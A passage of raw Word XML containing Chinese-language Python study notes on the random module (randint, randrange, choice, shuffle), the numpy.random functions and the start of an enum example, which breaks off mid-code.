        </w:rPr>
        <w:t>a &gt; b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，则生成的随机数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>n: a &gt;= n &gt;= b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> a &lt;b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>则</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> b &gt;= n &gt;= a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD4BBDB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1537C436" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>random.randint()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176F04A4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>random.randint(a, b)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，用于生成一个指定范围内的整数。其中参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是下限，参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是上限，生成的随机数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>n: a &lt;= n &lt;= b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1911C3D3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59922AA0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">print random.randint(12, 20)  # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生成的随机数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> n: 12 &lt;= n &lt;= 20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577A2613" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">print random.randint(20, 20)  # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结果永远是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">20     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04137A9A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># print random.randint(20, 10)  # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该语句是错误的。下限必须小于上限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A53154C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6064FD04" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D4B7EC3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>random.randrange([start], stop[, step])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744ABF6D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>random.randrange([start], stop[, step])</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，从指定范围内，按指定基数递增的集合中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取一个随机数。如：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>random.randrange(10, 100, 2)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，结果相当于从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">[10, 12, 14, 16, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>…</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 96, 98]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>序列中获取一个随机数。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>random.randrange(10, 100, 2)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在结果上与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> random.choice(range(10, 100, 2) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等效</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729EA876" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BB1BE69" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>random.choice:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从序列中随机选择</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE2B29C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FEAFD2A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>random.choice</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从序列中获取一个随机元素。其函数原型为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>random.choice(sequence)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sequence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表示一个有序类型。这里要说明</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一下：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sequence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不是一种特定的类型，而是泛指一系列的类型。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">list, tuple, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符串都属于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sequence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。有关</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sequence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以查看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>手册数据模型这一章。下面是使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>choice</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的一些例子：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FEFCB7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1531C4C3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>print random.choice("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>学习</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31561CDF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>print random.choice(["JGood", "is", "a", "handsome", "boy"])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9E5B0C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">print random.choice(("Tuple", "List", "Dict")) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0917B281" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D27BBDA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我对字典的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> dict.keys() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行直接的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>random.choice()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>没办法直接生成随机元素，得通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>转</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>换一下才可以。如下为当时的报错信息：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285E94DB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; random.choice(a.keys())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F81565F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Traceback (most recent call last):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDB58EC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  File "&lt;stdin&gt;", line 1, in &lt;module&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEF2A7B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  File "C:\Users\ranja\AppData\Local\Programs\Python\Python37-32\lib\random.py", line 262, in choic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3D74DE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    return seq[i]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B94DBB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TypeError: 'dict_keys' object is not subscriptable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE7B3AF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; random.choice(list(a.keys()))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE5159F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>'b'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7B2E74" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FB21318" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>random.shuffle()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：让序列随机打乱</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9382C5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>random.shuffle(a_list)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0C8D91" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F9FD0E3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="111D6CCF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="473" w:name="_Toc159779916"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>numpy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库</w:t>
      </w:r>
      <w:bookmarkEnd w:id="473"/>
    </w:p>
    <w:p w14:paraId="30E3FA98" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>numpy.random</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3511784E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>numpy.random.random(size=None)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A410F11" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CEBEB00" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>生成</w:t>
      </w:r>
      <w:r>
        <w:t>[0.0, 1.0)</w:t>
      </w:r>
      <w:r>
        <w:t>的随机数。注意区间是左闭右开，取不到</w:t>
      </w:r>
      <w:r>
        <w:t>1.0</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A32129" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>生成的是浮点数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3C0AA6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
      <w:r>
        <w:t>size</w:t>
      </w:r>
      <w:r>
        <w:t>可以用于指定生成随机数的个数和形状。例如</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C713363" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DCD0F77" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>numpy.random.rand(d0, d1, …, dn)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED73267" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50B58218" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>numpy.random.randint(low, high=None, size=None, dtype=‘l’)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4CA31E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D1A8BEB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E767DEE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="474" w:name="_Toc159779917"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>枚举类型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:enum</w:t>
      </w:r>
      <w:bookmarkEnd w:id="474"/>
    </w:p>
    <w:p w14:paraId="62C9D8D8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: https://blog.csdn.net/xietansheng/article/details/115557456</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7490B7F3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EEDCB2D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33987EC0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t># -*- coding: utf-8 -*-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4359E6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">import enum                 # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>导入枚举模块</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDCB7B4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">class Color(enum.Enum):     # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义一个名为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Color </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的枚举（继承</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> enum.Enum</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348044A4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    red = 1                 # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义枚举元素</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
